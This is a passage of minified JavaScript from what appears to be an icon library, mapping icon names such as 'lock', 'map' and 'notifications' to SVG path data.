2.75-.86 3.95c1.9-.31 3.36-1.96 3.36-3.95S16.5 6.36 14.6 6.05zM10 5.5C8.8 6.7 8 8.2 8 10s.8 3.3 2 4.4c1.2-1.1 2-2.7 2-4.5s-.8-3.3-2-4.4z"],lifesaver:["M8.143 14.644L7.028 17.43c.919.368 1.922.57 2.972.57s2.053-.202 2.972-.57l-1.115-2.786A4.986 4.986 0 0 1 10 15a4.986 4.986 0 0 1-1.857-.356zm-2.787-2.787A4.986 4.986 0 0 1 5 10c0-.656.126-1.283.356-1.857L2.57 7.028A7.978 7.978 0 0 0 2 10c0 1.05.202 2.053.57 2.972l2.786-1.115zm2.787-6.5A4.986 4.986 0 0 1 10 5c.656 0 1.283.126 1.857.356l1.115-2.786A7.978 7.978 0 0 0 10 2c-1.05 0-2.053.202-2.972.57l1.115 2.786zm6.5 2.786c.23.574.357 1.2.357 1.857 0 .656-.126 1.283-.356 1.857l2.786 1.115c.368-.919.57-1.922.57-2.972s-.202-2.053-.57-2.972l-2.786 1.115zM10 13a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 7C4.477 20 0 15.523 0 10S4.477 0 10 0s10 4.477 10 10-4.477 10-10 10z"],lightbulb:["M6.33 13.39c0 .34.27.61.6.61h6.13c.33 0 .6-.27.6-.61C14.03 9.78 16 9.4 16 6.09 16 2.72 13.31 0 10 0S4 2.72 4 6.09c0 3.31 1.97 3.69 2.33 7.3zM13 15H7c-.55 0-1 .45-1 1s.45 1 1 1h6c.55 0 1-.45 1-1s-.45-1-1-1zm-1 3H8c-.55 0-1 .45-1 1s.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1z"],link:["M10.85 11.98l-4.44 4.44-1 1c-.36.36-.86.58-1.41.58-1.1 0-2-.9-2-2 0-.55.22-1.05.59-1.41l5.44-5.44C7.69 9.06 7.36 9 7 9c-1.11 0-2.09.46-2.82 1.18l-.01-.01-3 3 .01.01C.46 13.91 0 14.89 0 16c0 2.21 1.79 4 4 4 1.11 0 2.09-.46 2.82-1.18l.01.01 3-3-.01-.01C10.54 15.09 11 14.11 11 13c0-.36-.06-.69-.15-1.02zM20 4c0-2.21-1.79-4-4-4-1.11 0-2.09.46-2.82 1.18l-.01-.01-3 3 .01.01C9.46 4.91 9 5.89 9 7c0 .36.06.69.15 1.02l4.44-4.44 1-1c.36-.36.86-.58 1.41-.58 1.1 0 2 .9 2 2 0 .55-.22 1.05-.59 1.41l-5.44 5.44c.34.09.67.15 1.03.15 1.11 0 2.09-.46 2.82-1.18l.01.01 3-3-.01-.01C19.54 6.09 20 5.11 20 4zM5 14a1.003 1.003 0 0 0 1.71.71l8-8a1.003 1.003 0 0 0-1.42-1.42l-2 2-2 2-2 2-2 2c-.18.18-.29.43-.29.71z"],list:["M1.03 1C.46 1 0 1.46 0 2.03v.95C0 3.54.46 4 1.03 4h17.95C19.54 4 20 3.54 20 2.97v-.94C20 1.46 19.54 1 18.97 1H1.03zM0 17.97C0 18.54.46 19 1.03 19h17.95c.56 0 1.03-.46 1.03-1.03v-.95c0-.56-.46-1.03-1.03-1.03H1.03C.46 16 0 16.46 0 17.03v.94zM0 12.97C0 13.54.46 14 1.03 14h17.95c.56 0 1.03-.46 1.03-1.03v-.95c0-.56-.46-1.03-1.03-1.03H1.03C.46 11 0 11.46 0 12.03v.94zM0 7.97C0 8.54.46 9 1.03 9h17.95C19.54 9 20 8.54 20 7.97v-.94C20 6.46 19.54 6 18.97 6H1.03C.46 6 0 6.46 0 7.03v.94z"],"list-columns":["M0 2.973v-.936C0 1.468.46 1.01 1.029 1H7.97C8.541 1 9 1.468 9 2.027v.946C9 3.542 8.53 4 7.971 4H1.03C.459 4 0 3.542 0 2.973zm0 5v-.936C0 6.468.46 6.01 1.029 6H7.97C8.541 6 9 6.468 9 7.027v.946C9 8.542 8.53 9 7.971 9H1.03C.459 9 0 8.542 0 7.973zm0 5v-.936C0 11.468.46 11.01 1.029 11H7.97C8.541 11 9 11.468 9 12.027v.946C9 13.542 8.53 14 7.971 14H1.03C.459 14 0 13.542 0 12.973zm0 5v-.936C0 16.468.46 16.01 1.029 16H7.97C8.541 16 9 16.468 9 17.027v.946C9 18.542 8.53 19 7.971 19H1.03C.459 19 0 18.542 0 17.973zm11-15v-.936c0-.569.46-1.027 1.029-1.037h6.942C19.541 1 20 1.468 20 2.027v.946C20 3.542 19.53 4 18.971 4H12.03C11.459 4 11 3.542 11 2.973zm0 5v-.936c0-.569.46-1.027 1.029-1.037h6.942C19.541 6 20 6.468 20 7.027v.946C20 8.542 19.53 9 18.971 9H12.03C11.459 9 11 8.542 11 7.973zm0 5v-.936c0-.569.46-1.027 1.029-1.037h6.942c.57 0 1.029.468 1.029 1.027v.946c0 .569-.47 1.027-1.029 1.027H12.03c-.57 0-1.029-.458-1.029-1.027zm0 5v-.936c0-.569.46-1.027 1.029-1.037h6.942c.57 0 1.029.468 1.029 1.027v.946c0 .569-.47 1.027-1.029 1.027H12.03c-.57 0-1.029-.458-1.029-1.027z"],"list-detail-view":["M8 6H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1zm0 5H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zm0 5H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1zM8 1H1c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1zm11 0h-7c-.55 0-1 .45-1 1v16c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V2c0-.55-.45-1-1-1z"],locate:["M10 8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm9 1h-1.07c-.45-3.61-3.32-6.45-6.93-6.91V1c0-.55-.45-1-1-1S9 .45 9 1v1.09C5.39 2.55 2.52 5.39 2.07 9H1c-.55 0-1 .45-1 1s.45 1 1 1h1.07c.45 3.61 3.32 6.45 6.93 6.91V19c0 .55.45 1 1 1s1-.45 1-1v-1.09c3.61-.46 6.48-3.29 6.93-6.91H19c.55 0 1-.45 1-1s-.45-1-1-1zm-4 2h.9a5.98 5.98 0 0 1-4.9 4.91V15c0-.55-.45-1-1-1s-1 .45-1 1v.91A5.98 5.98 0 0 1 4.1 11H5c.55 0 1-.45 1-1s-.45-1-1-1h-.9A5.98 5.98 0 0 1 9 4.09V5c0 .55.45 1 1 1s1-.45 1-1v-.91A5.98 5.98 0 0 1 15.9 9H15c-.55 0-1 .45-1 1s.45 1 1 1z"],lock:["M15.93 9H14V4.99c0-2.21-1.79-4-4-4s-4 1.79-4 4V9H3.93c-.55 0-.93.44-.93.99v8c0 .55.38 1.01.93 1.01h12c.55 0 1.07-.46 1.07-1.01v-8c0-.55-.52-.99-1.07-.99zM8 9V4.99c0-1.1.9-2 2-2s2 .9 2 2V9H8z"],"log-in":["M19 0h-8c-.55 0-1 .45-1 1s.45 1 1 1h7v16h-7c-.55 0-1 .45-1 1s.45 1 1 1h8c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-4 10c0-.28-.11-.53-.29-.71l-5-5a1.003 1.003 0 0 0-1.42 1.42L11.59 9H1c-.55 0-1 .45-1 1s.45 1 1 1h10.59L8.3 14.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l5-5c.18-.18.29-.43.29-.71z"],"log-out":["M19.71 9.29l-5-5a1.003 1.003 0 0 0-1.42 1.42L16.59 9H6c-.55 0-1 .45-1 1s.45 1 1 1h10.59l-3.29 3.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l5-5c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zM9 18H2V2h7c.55 0 1-.45 1-1s-.45-1-1-1H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h8c.55 0 1-.45 1-1s-.45-1-1-1z"],manual:["M20 1.1a.976.976 0 0 0-.83-.88C15.15-.43 12.07.34 10 2.5 7.93.34 4.85-.43.84.22.37.3.03.67 0 1.1v15.01c0 .07 0 .14.01.21.09.52.61.88 1.15.79 3.85-.62 6.4.16 8 2.46.02.02.03.04.05.07.02.02.04.04.06.07l.01.01a1.07 1.07 0 0 0 .28.19c.01 0 .01.01.02.01.03.01.07.03.1.04.01 0 .02.01.04.01.03.01.07.02.1.02.01 0 .02 0 .04.01H10c.04 0 .09 0 .13-.01.01 0 .03 0 .04-.01.03-.01.06-.01.1-.02.01 0 .03-.01.04-.01.03-.01.07-.02.1-.04.01 0 .02-.01.03-.01.07-.03.13-.07.19-.11.01 0 .01-.01.02-.01.02-.02.04-.03.06-.05.01-.01.02-.02.03-.02l.05-.05c.01-.01.02-.02.02-.03.01-.02.02-.03.04-.05 1.61-2.3 4.15-3.09 8-2.46.54.09 1.06-.26 1.15-.79-.01-.05 0-.09 0-.13V1.1zM9 16.63c-1.78-1.31-4.12-1.83-7-1.55V2c3.26-.37 5.51.39 7 2.35v12.28zm9-1.56c-2.88-.28-5.22.24-7 1.55V4.34c1.49-1.96 3.74-2.71 7-2.35v13.08z"],"manually-entered-data":["M1 12h4.34l2-2H1c-.55 0-1 .45-1 1s.45 1 1 1zm16.77-3.94l1.65-1.65c.36-.36.58-.86.58-1.41 0-1.1-.9-2-2-2-.55 0-1.05.22-1.41.59l-1.65 1.65 2.83 2.82zM1 4h12.34l2-2H1c-.55 0-1 .45-1 1s.45 1 1 1zM0 15c0 .55.45 1 1 1h.34l2-2H1c-.55 0-1 .45-1 1zm1-7h8.34l2-2H1c-.55 0-1 .45-1 1s.45 1 1 1zm18 2h-.34l-2 2H19c.55 0 1-.45 1-1s-.45-1-1-1zm0 4h-4.34l-2 2H19c.55 0 1-.45 1-1s-.45-1-1-1zM4 19l4.41-1.59-2.81-2.79L4 19zM14.23 5.94l-7.65 7.65 2.83 2.83 7.65-7.65-2.83-2.83z"],map:["M19.54 4.18l.01-.02-6-4-.01.02C13.39.08 13.21 0 13 0s-.39.08-.54.18l-.01-.02L7 3.8 1.55.17l-.01.01A.969.969 0 0 0 1 0C.45 0 0 .45 0 1v14c0 .35.19.64.46.82l-.01.02 6 4 .01-.02c.15.1.33.18.54.18s.39-.08.54-.18l.01.02L13 16.2l5.45 3.63.01-.02c.15.11.33.19.54.19.55 0 1-.45 1-1V5c0-.35-.19-.64-.46-.82zM6 17.13l-4-2.67V2.87l4 2.67v11.59zm6-2.67l-4 2.67V5.54l4-2.67v11.59zm6 2.67l-4-2.67V2.87l4 2.67v11.59z"],"map-create":["M18 9.22v7.91l-4-2.67V9.22c-.61-.55-1-1.33-1-2.22-.35 0-.69-.07-1-.18v7.65l-4 2.67V5.54l2.02-1.35c0-.06-.02-.13-.02-.19 0-1.66 1.34-3 3-3 0-.34.07-.66.17-.97C13.12.02 13.06 0 13 0c-.21 0-.39.08-.54.18l-.01-.02L7 3.8 1.55.17l-.01.01A.969.969 0 0 0 1 0C.45 0 0 .45 0 1v14c0 .35.19.64.46.82l-.01.02 6 4 .01-.02c.15.1.33.18.54.18s.39-.08.54-.18l.01.02L13 16.2l5.45 3.63.01-.02c.15.11.33.19.54.19.55 0 1-.45 1-1V6.82c-.31.11-.65.18-1 .18 0 .89-.39 1.67-1 2.22zM6 17.13l-4-2.67V2.87l4 2.67v11.59zM12 4c0 .55.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1V5h2c.55 0 1-.45 1-1s-.45-1-1-1h-2V1c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1z"],"map-marker":["M9.98 0c-3.87 0-7 2.98-7 6.67 0 3.68 7 13.33 7 13.33s7-9.65 7-13.33c0-3.68-3.14-6.67-7-6.67zm0 10c-1.66 0-3-1.34-3-3s1.34-3 3-3 3 1.34 3 3-1.34 3-3 3z"],maximize:["M19 0h-5c-.55 0-1 .45-1 1s.45 1 1 1h2.59L11.3 7.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L18 3.41V6c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zM8 11c-.28 0-.53.11-.71.29L2 16.59V14c0-.55-.45-1-1-1s-1 .45-1 1v5c0 .55.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1H3.41l5.29-5.29c.19-.18.3-.43.3-.71 0-.55-.45-1-1-1z"],media:["M15 9c1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm4-7H1c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm-1 13l-6-5-2 2-4-5-4 8V4h16v11z"],menu:["M1 6h18c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm18 3H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1zm0 5H1c-.55 0-1 .45-1 1s.45 1 1 1h18c.55 0 1-.45 1-1s-.45-1-1-1z"],"menu-closed":["M8 6h11c.55 0 1-.45 1-1s-.45-1-1-1H8c-.55 0-1 .45-1 1s.45 1 1 1zM4 6c-.28 0-.53.11-.71.29l-3 3C.11 9.47 0 9.72 0 10c0 .28.11.53.29.71l3 3A1.003 1.003 0 0 0 5 13V7c0-.55-.45-1-1-1zm15 8H8c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1zm0-5H8c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1z"],"menu-open":["M12 9H1c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1zm0 5H1c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1zm0-10H1c-.55 0-1 .45-1 1s.45 1 1 1h11c.55 0 1-.45 1-1s-.45-1-1-1zm7.71 5.29l-3-3A1.003 1.003 0 0 0 15 7v6a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],"merge-columns":["M6.71 6.29a1.003 1.003 0 0 0-1.42 1.42L6.59 9H2V2h5v2.18c.42.15.8.39 1.11.7l.01-.01.88.89V1c0-.55-.45-1-1-1H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-4.76l-.88.88-.01-.01c-.31.31-.69.56-1.11.71V18H2v-7h4.59L5.3 12.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-3-3zM19 0h-7c-.55 0-1 .45-1 1v4.76l.88-.88.01.01c.31-.31.69-.55 1.11-.7V2h5v7h-4.59l1.29-1.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L13.41 11H18v7h-5v-2.18c-.42-.15-.8-.39-1.11-.7l-.01.01-.88-.89V19c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1z"],"merge-links":["M10 13c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm8-5c-.93 0-1.71.64-1.93 1.5H14V4c0-2.21-1.79-4-4-4S6 1.79 6 4v5.5H3.93C3.71 8.64 2.93 8 2 8c-1.1 0-2 .9-2 2s.9 2 2 2c.93 0 1.71-.64 1.93-1.5H6V16c0 2.21 1.79 4 4 4s4-1.79 4-4v-5.5h2.07c.22.86 1 1.5 1.93 1.5 1.1 0 2-.9 2-2s-.9-2-2-2zm-5 8c0 1.66-1.34 3-3 3s-3-1.34-3-3V4c0-1.66 1.34-3 3-3s3 1.34 3 3v12zM10 3c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],minimize:["M8 11H3c-.55 0-1 .45-1 1s.45 1 1 1h2.59L.3 18.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L7 14.41V17c0 .55.45 1 1 1s1-.45 1-1v-5c0-.55-.45-1-1-1zM20 1a1.003 1.003 0 0 0-1.71-.71L13 5.59V3c0-.55-.45-1-1-1s-1 .45-1 1v5c0 .55.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1h-2.59l5.29-5.29c.19-.18.3-.43.3-.71z"],minus:["M16 9H4c-.55 0-1 .45-1 1s.45 1 1 1h12c.55 0 1-.45 1-1s-.45-1-1-1z"],"mobile-phone":["M15 0H5c-.55 0-1 .45-1 1v18c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-5 19c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm4-3H6V3h8v13z"],"mobile-video":["M19 5c-.28 0-.53.11-.71.29L15 8.59V5c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h13c.55 0 1-.45 1-1v-3.59l3.29 3.29c.18.19.43.3.71.3.55 0 1-.45 1-1V6c0-.55-.45-1-1-1z"],moon:["M19 14.15A9.94 9.94 0 0 1 9.94 20C4.45 20 0 15.55 0 10.06 0 6.03 2.4 2.56 5.85 1a9.811 9.811 0 0 0-.88 4.09c0 5.49 4.45 9.94 9.94 9.94 1.46 0 2.84-.31 4.09-.88z"],more:["M3.5 8a2.5 2.5 0 1 0 0 5 2.5 2.5 0 1 0 0-5zM17.5 8a2.5 2.5 0 1 0 0 5 2.5 2.5 0 1 0 0-5zM10.5 8a2.5 2.5 0 1 0 0 5 2.5 2.5 0 1 0 0-5z"],mountain:["M20 16H4l7-11h1l2 2h1l5 9zm-4-5l-1.5-3h-1l-1-1-1-1L8 11.5l3-1.5 1 1 1-1 3 1zM8.055 8L2.79 16H0l7-8h1.055z"],move:["M19.71 9.29l-3-3a1.003 1.003 0 0 0-1.42 1.42L16.59 9H11V3.41l1.29 1.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71l-3-3C10.53.11 10.28 0 10 0s-.53.11-.71.29l-3 3a1.003 1.003 0 0 0 1.42 1.42L9 3.41V9H3.41L4.7 7.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3C.11 9.47 0 9.72 0 10c0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L3.41 11H9v5.59L7.71 15.3A.965.965 0 0 0 7 15a1.003 1.003 0 0 0-.71 1.71l3 3c.18.18.43.29.71.29s.53-.11.71-.29l3-3a1.003 1.003 0 0 0-1.42-1.42L11 16.59V11h5.59l-1.29 1.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71z"],mugshot:["M19 0H1C.45 0 0 .45 0 1v18c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-1 18h-.07c-.05-.2-.12-.42-.22-.67-.46-1.05-2.68-1.75-4.16-2.4-1.48-.65-1.28-1.05-1.33-1.59-.01-.07-.01-.15-.01-.23.51-.45.92-1.07 1.19-1.78 0 0 .01-.04.02-.05.06-.15.11-.32.15-.48.34-.07.54-.44.61-.78.08-.14.23-.48.2-.87-.05-.5-.25-.73-.47-.82v-.09c0-.63-.06-1.55-.17-2.15-.02-.17-.06-.33-.11-.5a3.67 3.67 0 0 0-1.29-1.86C11.7 3.25 10.81 3 10.02 3s-1.68.25-2.31.73c-.61.47-1.07 1.13-1.29 1.86-.05.16-.09.33-.11.5-.12.6-.17 1.51-.17 2.14v.08c-.24.09-.44.32-.49.83-.04.39.12.73.2.87.08.35.28.72.63.78.04.17.09.33.15.48 0 .01.01.02.01.03l.01.01c.27.72.7 1.35 1.22 1.8 0 .07-.01.14-.01.21-.05.54.1.94-1.38 1.59-1.48.65-3.7 1.35-4.16 2.4-.12.27-.18.49-.23.69H2V2h16v16z"],"multi-select":["M19 3H7c-.55 0-1 .45-1 1v1h12v6h1c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1zm-6 6H1c-.55 0-1 .45-1 1v6c0 .55.45 1 1 1h12c.55 0 1-.45 1-1v-6c0-.55-.45-1-1-1zm-1 6H2v-4h10v4zm4-9H4c-.55 0-1 .45-1 1v1h12v6h1c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1z"],music:["M19 0c-.08 0-.16.03-.24.05V.03l-12 3v.02C6.33 3.16 6 3.53 6 4v11.35c-.59-.22-1.27-.35-2-.35-2.21 0-4 1.12-4 2.5S1.79 20 4 20c1.94 0 3.55-.86 3.92-2H8V7.78l10-2.5v7.07c-.59-.22-1.27-.35-2-.35-2.21 0-4 1.12-4 2.5s1.79 2.5 4 2.5c1.94 0 3.55-.86 3.92-2H20V1c0-.55-.45-1-1-1z"],"new-grid-item":["M8 0H1C.45 0 0 .45 0 1v7c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm0 11H1c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h7c.55 0 1-.45 1-1v-7c0-.55-.45-1-1-1zm6 7h-1v-1c0-.55-.45-1-1-1s-1 .45-1 1v2c0 .55.45 1 1 1h2c.55 0 1-.45 1-1s-.45-1-1-1zm5-7h-2c-.55 0-1 .45-1 1s.45 1 1 1h1v1c0 .55.45 1 1 1s1-.45 1-1v-2c0-.55-.45-1-1-1zm0-11h-7c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h7c.55 0 1-.45 1-1V1c0-.55-.45-1-1-1zm-5 11h-2c-.55 0-1 .45-1 1v2c0 .55.45 1 1 1s1-.45 1-1v-1h1c.55 0 1-.45 1-1s-.45-1-1-1zm5 5c-.55 0-1 .45-1 1v1h-1c-.55 0-1 .45-1 1s.45 1 1 1h2c.55 0 1-.45 1-1v-2c0-.55-.45-1-1-1z"],"new-link":["M14.5 12a2.5 2.5 0 0 0-2.45 2h-7.1a2.5 2.5 0 1 0 0 1h7.1a2.5 2.5 0 1 0 2.45-3zM19 5h-2V3c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1V7h2c.55 0 1-.45 1-1s-.45-1-1-1z"],"new-object":["M12 4c0 .6.4 1 1 1h2v2c0 .6.4 1 1 1 .5 0 1-.4 1-1V5h2c.5 0 1-.4 1-1s-.5-1-1-1h-2V1c0-.6-.5-1-1-1-.6 0-1 .4-1 1v2h-2c-.6 0-1 .5-1 1zm7 3c0 1.7-1.3 3-3 3s-3-1.3-3-3c-1.7 0-3-1.3-3-3s1.3-3 3-3c0-.2 0-.4.1-.5-1-.3-2-.5-3.1-.5C4.5 0 0 4.5 0 10s4.5 10 10 10 10-4.5 10-10c0-1.1-.2-2.1-.5-3H19z"],"new-person":["M11.41 15.92c-1.46-.65-1.26-1.05-1.31-1.59-.01-.07-.01-.15-.01-.23.5-.45.91-1.07 1.18-1.78 0 0 .01-.04.02-.05.06-.15.11-.32.15-.48.33-.07.53-.44.6-.78.08-.14.23-.48.2-.87-.05-.5-.24-.73-.47-.82v-.09c0-.63-.06-1.55-.17-2.15-.02-.17-.06-.33-.11-.5-.22-.73-.67-1.4-1.27-1.86C9.58 4.25 8.7 4 7.92 4c-.78 0-1.66.25-2.28.73-.61.47-1.06 1.13-1.27 1.86-.05.16-.08.33-.11.5-.12.6-.18 1.51-.18 2.14v.08c-.23.09-.43.32-.48.83-.04.39.12.73.2.87.08.35.28.72.62.78.04.17.09.33.15.48 0 .01.01.02.01.03l.01.01c.27.72.69 1.35 1.21 1.8 0 .07-.01.14-.01.21-.05.54.1.94-1.36 1.59-1.46.65-3.66 1.35-4.11 2.4C-.14 19.38.04 20 .04 20h15.75s.18-.62-.27-1.67c-.45-1.06-2.65-1.75-4.11-2.41zM18.87 3h-2V1c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1V5h2c.55 0 1-.45 1-1s-.45-1-1-1z"],"new-prescription":["M11.95 10.23c.16-.18.22-.22.46-.22h1.48c.25 0 .47.08.59.33.1.2.09.41-.05.66l-2.71 3.58L14.88 19c.13.21.16.46.03.69-.12.21-.34.31-.57.31H12.7c-.31 0-.56-.17-.7-.44l-1.9-2.67-1.93 2.68c-.15.27-.42.43-.73.43H5.98c-.25 0-.47-.08-.59-.33-.1-.2-.09-.41.05-.66l3.09-4.35L4.26 9H3v4.32c0 .41-.3.69-.7.69H.7c-.41 0-.7-.28-.7-.69V.69C0 .28.3 0 .7 0h4.42c.71 0 1.36.1 1.94.3.59.2 1.11.49 1.54.87.44.38.78.84 1.02 1.39.25.54.37 1.13.37 1.77 0 1.01-.28 1.88-.84 2.6-.43.54-1.35 1.29-2 1.59l3.09 3.94 1.71-2.23zM4.71 6.04c.71 0 1.45-.16 1.81-.46.33-.28.5-.69.5-1.25s-.17-.97-.5-1.25c-.35-.3-1.1-.46-1.81-.46h-1.7v3.42h1.7zM19 3c.55 0 1 .45 1 1s-.45 1-1 1h-2v2c0 .55-.45 1-1 1s-1-.45-1-1V5h-2c-.55 0-1-.45-1-1s.45-1 1-1h2V1c0-.55.45-1 1-1s1 .45 1 1v2h2z"],"new-text-box":["M19 3h-2V1c0-.55-.45-1-1-1s-1 .45-1 1v2h-2c-.55 0-1 .45-1 1s.45 1 1 1h2v2c0 .55.45 1 1 1s1-.45 1-1V5h2c.55 0 1-.45 1-1s-.45-1-1-1zM5 7.5v1c0 .28.22.5.5.5s.5-.22.5-.5V8h2v7h-.5c-.28 0-.5.22-.5.5s.22.5.5.5h2c.28 0 .5-.22.5-.5s-.22-.5-.5-.5H9V8h2v.5c0 .28.22.5.5.5s.5-.22.5-.5v-1c0-.28-.22-.5-.5-.5h-6c-.28 0-.5.22-.5.5zM16 9c-.55 0-1 .45-1 1v8H2V5h8c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1v15c0 .55.45 1 1 1h15c.55 0 1-.45 1-1v-9c0-.55-.45-1-1-1z"],ninja:["M20 6s-2.98 2.43-6.12 2.19C13.52 5.31 12.05 0 6 0c0 0 2.41 2.99 2.16 6.12C5.27 6.49 0 7.97 0 14c0 0 2.98-2.43 6.11-2.19C6.47 14.69 7.94 20 14 20c0 0-2.42-2.99-2.16-6.13C14.73 13.51 20 12.02 20 6zm-10 6c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"],notifications:["M10 20c1.1 0 2-.9 2-2H8c0 1.1.9 2 2 2zm7-5c-.55 0-1-.45-1-1V8c0-2.61-1.67-4.81-4-5.63V2c0-1.1-.9-2-2-2S8 .9 8 2v.37C5.67 3.19 4 5.39 4 8v6c0 .55-.45 1-1 1s-1 .45-1 1 .45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1z"],"notifications-updated":["M10 20c1.1 0 2-.9 2-2H8c0 1.1.9 2 2 2zm2-17.834A2.994 2.994 0 0 0 8 4.99c0 .808.319 1.557.876 2.114l2.97 2.99a2.99 2.99 0 0 0 4.154.072V14c0 .55.45 1 1 1s1 .45 1 1-.45 1-1 1H3c-.55 0-1-.45-1-1s.45-1 1-1 1-.45 1-1V8c0-2.61 1.67-4.81 4-5.63V2c0-1.1.9-2 2-2s2 .9 2 2v.166zm1.26 6.514l-2.97-2.99a.973.973 0 0 1-.29-.7c0-.55.44-1 .99-1 .27 0 .52.11.7.29l2.28 2.28 4.27-4.27a.99.99 0 0 1 .7-.29c.55 0 1 .45 1 1 0 .28-.11.53-.3.7l-4.98 4.98a.99.99 0 0 1-1.4 0z"],"numbered-list":["M1.74 9.01h1.27V1h-.95c-.04.24-.12.45-.26.62-.13.17-.29.3-.47.41-.19.11-.4.18-.63.23-.23.04-.46.07-.71.07v1.03h1.75v5.65zm.43 7.93c.18-.14.37-.28.58-.43.21-.14.42-.29.63-.45.21-.16.41-.33.61-.5.2-.18.37-.38.52-.59.15-.21.28-.45.37-.7.09-.25.14-.54.14-.85 0-.25-.04-.52-.12-.8-.08-.28-.21-.54-.39-.78-.19-.24-.43-.44-.73-.59-.3-.17-.68-.25-1.12-.25-.41 0-.77.08-1.08.23-.32.16-.58.37-.8.64-.22.27-.38.59-.49.96-.11.37-.16.77-.16 1.21h1.19c.01-.28.03-.53.08-.77s.12-.45.21-.62c.09-.18.22-.31.38-.42.16-.1.35-.15.59-.15.26 0 .47.05.63.14.16.09.29.21.38.35.09.14.15.29.18.45.03.16.05.31.05.45-.01.31-.08.58-.22.81-.14.24-.32.45-.53.66-.22.2-.45.39-.71.57-.26.18-.51.36-.74.54-.5.36-.89.78-1.17 1.27-.3.47-.45 1.04-.46 1.69H5v-1.14H1.43c.05-.17.14-.33.27-.49.13-.15.29-.3.47-.44zM18 4.02H8c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-1c0-.56-.45-1-1-1zm0 9H8c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h10c.55 0 1-.45 1-1v-1c0-.56-.45-1-1-1z"],numerical:["M2.39 5.75c-.17.21-.38.39-.63.52s-.52.23-.83.29c-.3.05-.61.08-.93.08v1.24h2.49V15h1.49V4.98H2.73c-.05.31-.17.57-.34.77zm17.2 4.71c-.27-.44-.65-.71-1.14-.82v-.02c.42-.16.72-.43.92-.79.2-.36.29-.79.29-1.27 